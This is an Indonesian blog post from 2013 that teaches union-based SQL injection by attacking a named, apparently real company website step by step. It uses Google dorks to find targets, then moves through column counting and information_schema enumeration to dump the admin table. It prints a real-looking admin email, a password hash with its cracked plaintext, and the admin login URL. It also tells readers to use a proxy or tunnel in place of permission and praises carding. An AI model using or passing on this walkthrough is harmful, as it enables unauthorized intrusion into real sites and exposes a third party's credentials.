Tuesday, 11 June 2013

[ Basic Sql Inejction ]

A) Pendahuluan
SQL Injection di PHP tentu berbeda.
Yang harus diketahui sebelum sql injection pada php adalah di depan sama dengan (=) ditambahkan tanda minus (id=-).
Itu artinya sama dengan 1=2 agar id tersebut bernilai error.
Dan di belakang menggunakan tanda /* sama artinya dengan tanda --,# yang menandakan akhir perintah.

Sekarang saya akan memberikan 1 contoh website.
Tapi sebelum melangkah lebih jauh, ada baiknya kita juga mempelajari cara mencari targetnya.
Untuk itu kita lebih dahulu harus mengerti dari special syntax yang ada pada Google.

Contoh :

inurl:"shredder-categories.php?id="
inurl:"tradeCategory.php?id="
inurl:"product_ranges_view.php?ID="

B) Bagaimana kita dapat mengetahui website tersebut mengandung vuln SQL Injection?
Kita dapat menggunakan petik tunggal (') atau menggunakan operator (and 1=2) untuk mendapatkan error yang mengindikasikan respon dari mysql server.
Saya memberikan contoh hasil pencarian melalui search engine google untuk dork : "product_list.php?id="

Contoh website :
http://www.amvalewavs.co.uk

Kemudian kita harus mencari vulneralbility pada website tersebut yang memuat dork "product_list.php?id="
Dan kita menemukannya pada link url : http://www.amvalewavs.co.uk/product_list.php?id=1

Cara mengecek bug pada ini web adalah :
1. Tambahkan tanda +and+1=0 (bernilai false)


http://www.amvalewavs.co.uk/product_list...=1+and+1=0 -------> (artikel web akan menghilang)

2. Tambahkan and 1=1 (bernilai true)
http://www.amvalewavs.co.uk/product_list...=1+and+1=1 -------> (artikel web tampil kembali)

3. Atau dapat juga dengan cara menambahkan tanda petik tunggal (')
http://www.amvalewavs.co.uk/product_list.php?id=1' ----------> (You have an error in your SQL syntax....)

Dari percobaan-percobaan tersebut di atas, sudah dapat dipastikan bahwa web tersebut mempunyai celah (vulner) untuk ditembus dengan sql.
Kemudian kita akan mencari magic number pada web tersebut agar kita dapat memasukan query sql-nya.


C) Memeriksa Kolom

Dalam tahap ini kita memeriksa jumlah kolom sampai dimana kondisi tersebut adalah false.
Cara melakukan pengecekan dimulai dari 1 s/d kondisi halaman mendapatkan kondisi false.

Kita akan menggunakan syntax : order+by+1..dst -- (berfungsi untuk mencari finished number).

Akhirnya kondisi false diketahui pada kolom 13 :

http://www.amvalewavs.co.uk/product_list...11,12,13--

(Unknown column '13' in 'order clause', Sorry, no products in this category)

Maka dapat disimpulkan bahwa kolom yang tersedia pada website tersebut adalah 12 kolom.


D) Mencari Lubang Kolom (Magic Number)
Dalam mencari magic number ini tidaklah sulit, jika kita sudah memeriksa dan menentukan jumlah kolom yang tersedia.
Dalam tahap ini kita menggunakan syntax : 'union+select'
Dan sudah kita periksa bahwa jumlah kolom yang tersedia adalah 12.
Nantinya segala informasi database akan dikeluarkan melalui magic number tersebut, yaitu 12.
Kita dapat menggunakan tanda Minus pada akhir tanda sama dengan =-
Dan menambahkan tanda -- sebagai tanda akhir perintah di belakang Url target.

http://www.amvalewavs.co.uk/product_list...10,11,12--

Pada langkah di atas tampaklah bahwa angka 4 inilah yang disebut magic number.
Dari langkah tersebut, terlihat hanya angka 4 yang dapat kita gunakan.


E) Melihat Informasi Versi MySQL
Mengapa informasi versi MySQL perlu kita ketahui?
Karena setiap metode hack pada MySQL versi 4 dan versi 5 sangat berbeda.
Dalam tahap ini saya menggunakan version(). Letakkan version() pada magic number pada langkah sebelumya.

http://www.amvalewavs.co.uk/product_list...10,11,12--

Maka terlihat bahwa versi MySQl adalah versi 5.0.45
Untuk MySQL versi 5, maka kita dapat lanjutkan ke pemeriksaan tabel dan kolom.
Tapi untuk versi 4, maka kita harus mencari dan menebak database, nama tabel dan kolom yang ditempatkan tidak beraturan.


F) Memeriksa Tabel
Untuk memeriksa tabel, kita menggunakan 3 perintah dalam kasus ini.
Syntax : 'union+select' ; 'group_concat(table_name)' ; 'from+information_schema.tables+where+table_schema=database()--'
Artinya : kita akan mengeluarkan keseluruhan tabel menggunakan information schema dimana table yang di-schema adalah dari fungsi query database().
Dapat diartikan bahwa database() adalah perintah yang digunakan untuk melihat nama database.

Langkah untuk melihat tabel :
http://www.amvalewavs.co.uk/product_list...a.tables--

Langkah untuk mencari tabel (limit):
http://www.amvalewavs.co.uk/product_list...mit+18,1--

Langkah cepat untuk melihat tabel :
http://www.amvalewavs.co.uk/product_list...tabase()--


G) Melihat Isi Kolom Dari Tabel
Pada tahap ini kita dapat mengetahui kolom-kolom pada tabel yang bersangkutan.

Untuk mengeluarkan column name, syntax-nya sama dengan mengeluarkan table name, hanya saja "table" kita ganti dengan "column".
Syntax : 'union+select' ; 'group_concat(column_name)' ; 'from+information_schema.columns+where+table_name=nama_table_target--
Artinya : kita akan mengeluarkan keseluruhan column menggunakan information schema dimana table name-nya = table yang jadi tujuan
Contoh : saya ingin mengeluarkan column yang ada pada table "admin" yang tampil pada website target.

http://www.amvalewavs.co.uk/product_list...646D696E--

Keterangan :
0x61646D696E = adalah Hexa string dari Ascii textnya "admin".
Anda dapat melakukan convert text ke Ascii di : http://ascii-convert[dot]tk/


H) Melihat Data Dari Kolom Tersebut
Sekarang kita ingin melihat isi dari column name tersebut
.

Ini adalah Langkah terahkir. Peranan perintah 'group_concat' sangatlah membantu dalam hal mempersingkat waktu.

Contoh : saya hanya akan mengeluarkan data 'admin_email_address' dan 'admin_password'
dari kolom admin


http://www.amvalewavs.co.uk/product_list...om+admin--

Dan sekarang dapat kita lihat hasilnya dari kolom admin tersebut :
Email : develop@conceptwebsites.com

Password : 0e311e5b9704f28b4e8557e8fa3fbe7d

Tinggal decrypt deh passwordnya sendiri (cari sendiri tool dan link-nya ya...)
Dan ternyata setelah saya decrypt password di atas, hasilnya adalah "qwerty12".




I) Mencari Link Url Login Admin

Gunakan feeling, pengalaman dan daya ingat kita saja.
Tapi kalau Anda sudah menyerah, silakan cari saja software IntelliTamper.
Lalu install dan scan website target kita.
Finishing : carilah link direktori css, login, admin, admin1, dan sejenisnya (yang penting url untuk login admin).

Dan ternyata hasil yang saya peroleh adalah :
http://www.amvalewavs.co.uk/admin1/login.php

Tapi inget, jangan masuk-masuk rumah orang tanpa ijin lho. Kalau mau masuk, ya slalu ijin dulu atau pake proxy/tunnel ya.

"Carding is The Art, Soul and Respect"

2 comments